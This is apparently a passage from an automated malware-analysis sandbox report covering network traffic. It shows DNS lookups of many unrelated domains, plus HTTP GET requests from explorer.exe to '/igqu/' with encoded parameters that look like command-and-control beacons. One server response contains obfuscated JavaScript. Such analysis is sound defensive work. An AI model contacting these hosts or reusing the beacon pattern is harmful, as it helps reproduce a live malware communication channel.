                                                                        Nov 20, 2020 11:07:22.095258951 CET53595718.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:22.490994930 CET5268953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:22.526623964 CET53526898.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:23.161501884 CET5029053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:23.188550949 CET53502908.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:23.994404078 CET6042753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.032332897 CET53604278.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:24.212080002 CET5620953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.256122112 CET53562098.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:24.626653910 CET5958253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.662291050 CET53595828.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:25.574372053 CET6094953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:25.610099077 CET53609498.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:26.049972057 CET5854253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:26.085650921 CET53585428.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:26.373533010 CET5917953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:26.419915915 CET53591798.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:31.892540932 CET6092753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:31.952383041 CET53609278.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:37.022685051 CET5785453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:38.007904053 CET5785453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:38.637741089 CET53578548.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:38.645028114 CET53578548.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:43.998091936 CET6202653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:44.209893942 CET53620268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:47.683054924 CET5945353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:47.718767881 CET53594538.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:49.590164900 CET6246853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:49.638459921 CET53624688.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:50.345526934 CET5256353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:50.372570992 CET53525638.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:54.783478975 CET5472153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:54.842215061 CET53547218.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:00.294127941 CET6282653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:00.346420050 CET53628268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:05.605511904 CET6204653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:05.657974005 CET53620468.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:10.702775002 CET5122353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:10.896162033 CET53512238.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:11.861721992 CET6390853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:11.888716936 CET53639088.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:16.285459042 CET4922653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:16.345438957 CET53492268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:21.531033039 CET6021253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:21.683366060 CET53602128.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:26.922692060 CET5886753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:26.962616920 CET53588678.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:32.013992071 CET5086453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:32.363317966 CET53508648.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:37.781757116 CET6150453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:38.542803049 CET53615048.8.8.8192.168.2.7

                                                                        ICMP Packets

                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Nov 20, 2020 11:07:38.645275116 CET192.168.2.78.8.8.8d013(Port unreachable)Destination Unreachable

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Nov 20, 2020 11:07:09.575184107 CET192.168.2.78.8.8.80x1206Standard query (0)www.handsfreedocs.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:15.370619059 CET192.168.2.78.8.8.80x117fStandard query (0)www.maninhatphoto.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.464678049 CET192.168.2.78.8.8.80x9c6eStandard query (0)www.placeduconfort.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:31.892540932 CET192.168.2.78.8.8.80xf39dStandard query (0)www.heartandcrowncloset.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:37.022685051 CET192.168.2.78.8.8.80xa3bbStandard query (0)www.fahufu.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.007904053 CET192.168.2.78.8.8.80xa3bbStandard query (0)www.fahufu.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:43.998091936 CET192.168.2.78.8.8.80x19a6Standard query (0)www.the-gongs.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.590164900 CET192.168.2.78.8.8.80x3a20Standard query (0)www.shopnicknaks.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:54.783478975 CET192.168.2.78.8.8.80x3f24Standard query (0)www.sweetbasilmarketing.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:00.294127941 CET192.168.2.78.8.8.80xc8ebStandard query (0)www.justsoldbykristen.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.605511904 CET192.168.2.78.8.8.80x2a2aStandard query (0)www.ariasu-nakanokaikei.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:10.702775002 CET192.168.2.78.8.8.80x9a72Standard query (0)www.realitytvstockwatch.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:16.285459042 CET192.168.2.78.8.8.80x6cbbStandard query (0)www.searchnehomes.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.531033039 CET192.168.2.78.8.8.80xa56cStandard query (0)www.happinestbuilders.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:26.922692060 CET192.168.2.78.8.8.80xbf40Standard query (0)www.hemparcade.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:32.013992071 CET192.168.2.78.8.8.80xca10Standard query (0)www.lotoencasa.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:37.781757116 CET192.168.2.78.8.8.80xa179Standard query (0)www.handsfreedocs.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Nov 20, 2020 11:07:10.355617046 CET8.8.8.8192.168.2.70x1206Server failure (2)www.handsfreedocs.comnonenoneA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:15.667937994 CET8.8.8.8192.168.2.70x117fNo error (0)www.maninhatphoto.com154.86.218.70A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)www.placeduconfort.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.202.18A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.134.22.63A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.72.189A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:31.952383041 CET8.8.8.8192.168.2.70xf39dNo error (0)www.heartandcrowncloset.comheartandcrowncloset.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:31.952383041 CET8.8.8.8192.168.2.70xf39dNo error (0)heartandcrowncloset.com160.153.136.3A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.637741089 CET8.8.8.8192.168.2.70xa3bbNo error (0)www.fahufu.comfahufu.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.637741089 CET8.8.8.8192.168.2.70xa3bbNo error (0)fahufu.com194.35.122.226A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.645028114 CET8.8.8.8192.168.2.70xa3bbNo error (0)www.fahufu.comfahufu.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.645028114 CET8.8.8.8192.168.2.70xa3bbNo error (0)fahufu.com194.35.122.226A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:44.209893942 CET8.8.8.8192.168.2.70x19a6No error (0)www.the-gongs.com104.253.79.71A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)www.shopnicknaks.comwww188.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)www188.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:54.842215061 CET8.8.8.8192.168.2.70x3f24No error (0)www.sweetbasilmarketing.comsweetbasilmarketing.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:54.842215061 CET8.8.8.8192.168.2.70x3f24No error (0)sweetbasilmarketing.com185.201.11.126A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:00.346420050 CET8.8.8.8192.168.2.70xc8ebNo error (0)www.justsoldbykristen.com52.71.133.130A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.80A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.83A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.107A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.49A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:10.896162033 CET8.8.8.8192.168.2.70x9a72No error (0)www.realitytvstockwatch.com103.224.182.242A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:16.345438957 CET8.8.8.8192.168.2.70x6cbbNo error (0)www.searchnehomes.comsearchnehomes.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:08:16.345438957 CET8.8.8.8192.168.2.70x6cbbNo error (0)searchnehomes.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)www.happinestbuilders.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.134.22.63A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.202.18A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.72.189A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:26.962616920 CET8.8.8.8192.168.2.70xbf40No error (0)www.hemparcade.com52.58.78.16A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:32.363317966 CET8.8.8.8192.168.2.70xca10No error (0)www.lotoencasa.com192.155.168.14A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:38.542803049 CET8.8.8.8192.168.2.70xa179Server failure (2)www.handsfreedocs.comnonenoneA (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.maninhatphoto.com
                                                                        • www.placeduconfort.com
                                                                        • www.heartandcrowncloset.com
                                                                        • www.fahufu.com
                                                                        • www.the-gongs.com
                                                                        • www.shopnicknaks.com
                                                                        • www.sweetbasilmarketing.com
                                                                        • www.justsoldbykristen.com
                                                                        • www.ariasu-nakanokaikei.com
                                                                        • www.realitytvstockwatch.com
                                                                        • www.searchnehomes.com
                                                                        • www.happinestbuilders.com
                                                                        • www.hemparcade.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.749734154.86.218.7080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:15.932311058 CET448OUTGET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.maninhatphoto.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:16.187412977 CET450INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 20 Nov 2020 10:07:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 9558
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 31 33 33 38 3b 26 23 32 32 32 36 39 3b 26 23 33 38 34 36 39 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 47 42 4b 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 69 74 65 61 70 70 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 0d 0a 09 09 09 62 6f 64 79 20 7b 0d 0a 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 36 45 41 45 42 3b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 27 ce a2 c8 ed d1 c5 ba da 27 2c 20 27 cb ce cc e5 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 0d 0a 7d 0d 0a 61 7b 0d 0a 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 37 42 37 42 37 42 3b 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 31 30 30 70 78 29 20 7b 0d 0a 09 2e 61 6c 65 72 74 2d 62 6f 78 20 7b 0d 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 39 36 70 78 20 61 75 74 6f 20 30 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 38 30 70 78 20 38 35 70 78 20 32 32 70 78 3b 0d 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 20 31 30 70 78 20 30 20 30 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 3b 0d 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 39 70 78 20 31 37 70 78 20 72 67 62 61 28 31 30 32 2c 31 30 32 2c 31 30 32 2c 30 2e 37 35 29 3b 0d 0a 09 77 69 64 74 68 3a 20 32 38 36 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 62 6f 78 20 70 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 2d 35 30 70 78 3b 0d 0a 09 6c 65 66 74 3a 20 31 31 31 70 78 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 63 69 72 63 6c 65 20 7b 0d 0a 09 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0d 0a 09 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 37 33 35 3b 0d 0a 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 20 31 73 20 6c 69 6e 65 61 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 31 31 70 78 3b 0d 0a 09 6c 65 66 74 3a 20 31 39 30 70 78 3b 0d 0a 09 77
                                                                        Data Ascii: <!DOCTYPE html><html><title>&#20122;&#21338;&#22269;&#38469;</title><head><meta charset="GBK"><meta http-equiv="Cache-Control" content="no-siteapp" /><meta http-equiv="Cache-Control" content="no-transform" /><meta name="applicable-device" content="pc,mobile"><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /><style>body {margin: 0;padding: 0;background: #E6EAEB;font-family: Arial, '', '', sans-serif}a{ text-decoration: none;color: #7B7B7B;}@media screen and (min-width:1100px) {.alert-box {display: none;position: relative;margin: 96px auto 0;padding: 180px 85px 22px;border-radius: 10px 10px 0 0;background: #FFF;box-shadow: 5px 9px 17px rgba(102,102,102,0.75);width: 286px;color: #FFF;text-align: center}.alert-box p {margin: 0}.alert-circle {position: absolute;top: -50px;left: 111px}.alert-sec-circle {stroke-dashoffset: 0;stroke-dasharray: 735;transition: stroke-dashoffset 1s linear}.alert-sec-text {position: absolute;top: 11px;left: 190px;w
                                                                        Nov 20, 2020 11:07:16.187463999 CET451INData Raw: 69 64 74 68 3a 20 37 36 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 38 70 78 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 75 6e 69 74 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                        Data Ascii: idth: 76px;color: #000;font-size: 68px}.alert-sec-unit {font-size: 34px}.alert-body {margin: 35px 0;margin-bottom:30px;}.alert-head {color: #242424;font-size: 28px}.alert-concent {margin: 25px 0
                                                                        Nov 20, 2020 11:07:16.440414906 CET452INData Raw: 6f 74 65 72 2d 74 65 78 74 20 70 20 7b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 37 41 37 41 37 41 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 0d 0a 09 7d 0d 0a 7d 0d 0a 2e 68 61
                                                                        Data Ascii: oter-text p {color: #7A7A7A;font-size: 22px;line-height: 18px}}.handsel{width: 80%;margin: 0px auto;}img{width: 100%;}</style><script>var _0x3369=['C2nYAxb0','Ahr0Chm6lY9OBs5IywLKDs5JB20VAg0UANm/zwjIng
                                                                        Nov 20, 2020 11:07:16.440454006 CET454INData Raw: 67 22 20 3e 09 0d 0a 09 09 09 09 0d 0a 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 2d 63 6f 6e 63 65 6e 74 22 3e 0d 0a 09 09 09 09 09 3c 70 3e 3c 2f 70 3e 0d 0a 09 09 09 09 09 3c 70 3e
                                                                        Data Ascii: g" ></div><div class="alert-concent"><p></p><p>&#20122;&#21338;&#23448;&#26041;&#32593;&#22336;&#65306;<a href='http://yuyabo.com/' style="font-weight: 700"><font size="5vw" weight="bold" color="#04A
                                                                        Nov 20, 2020 11:07:16.440473080 CET455INData Raw: 61 28 31 30 32 2c 31 30 32 2c 31 30 32 2c 30 2e 37 35 29 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65
                                                                        Data Ascii: a(102,102,102,0.75);width: 100%;color: #FFF;text-align: center}.alert-box p {margin: 0}.alert-circle {position: absolute;top: -10%;left: 27%}.alert-sec-circle {stroke-dashoffset: 0;stroke-dasharray:
                                                                        Nov 20, 2020 11:07:16.440496922 CET456INData Raw: 33 61 31 31 38 62 3c 5f 30 78 32 30 62 66 64 32 3b 5f 30 78 33 61 31 31 38 62 2b 2b 29 7b 5f 30 78 32 38 61 36 39 66 2b 3d 27 25 27 2b 28 27 30 30 27 2b 5f 30 78 34 33 32 65 64 30 5b 27 63 68 61 72 43 6f 64 65 41 74 27 5d 28 5f 30 78 33 61 31 31
                                                                        Data Ascii: 3a118b<_0x20bfd2;_0x3a118b++){_0x28a69f+='%'+('00'+_0x432ed0['charCodeAt'](_0x3a118b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x28a69f);},_0x5ac6['wWPwhk']={},_0x5ac6['zXEDbv']=!![];}var _0x3a2715=_0x5ac6['wWPwhk'][_0x2a8
                                                                        Nov 20, 2020 11:07:16.693258047 CET458INData Raw: 6e 64 65 78 4f 66 27 5d 28 5f 30 78 31 35 31 37 31 63 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 32 66 37 61 37 30 3b 7d 3b 5f 30 78 31 61 61 31 5b 27 43 4e 61 42 4f 4f 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 31 32 63 38 33 29 7b 76 61 72 20
                                                                        Data Ascii: ndexOf'](_0x15171c);}return _0x2f7a70;};_0x1aa1['CNaBOO']=function(_0x412c83){var _0x50f9e0=_0x3981ea(_0x412c83);var _0x387a3a=[];for(var _0x3ee753=0x0,_0x5e4f87=_0x50f9e0['length'];_0x3ee753<_0x5e4f87;_0x3ee753++){_0x387a3a+='%'+('00'+_0x50f9
                                                                        Nov 20, 2020 11:07:16.693357944 CET458INData Raw: 74 42 79 49 64 28 22 6a 73 2d 73 65 63 2d 74 65 78 74 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 74 3b 0d 0a 09 09 09 09 09 09 76 61 72 20 65 20 3d 20 4d 61 74 68 2e 72 6f 75 6e 64 28 74 20 2f 20 31 20 2a 20 37 33 35 29 3b 0d 0a 09 09 09 09 09
                                                                        Data Ascii: tById("js-sec-text").innerHTML = t;var e = Math.round(t / 1 * 735);n.style.strokeDashoffset = e - 735}}, 970);}</script><script>alertSet('&#27426;&#36814;&#26469;&#21040;</br><font size="5vw" weig


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.7497373.12.202.1880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:21.718597889 CET611OUTGET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.placeduconfort.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:21.831310034 CET618INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:07:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.74976334.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:16.363661051 CET5429OUTGET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.searchnehomes.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:16.486833096 CET5429INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Fri, 20 Nov 2020 10:08:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "5fb6e13a-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
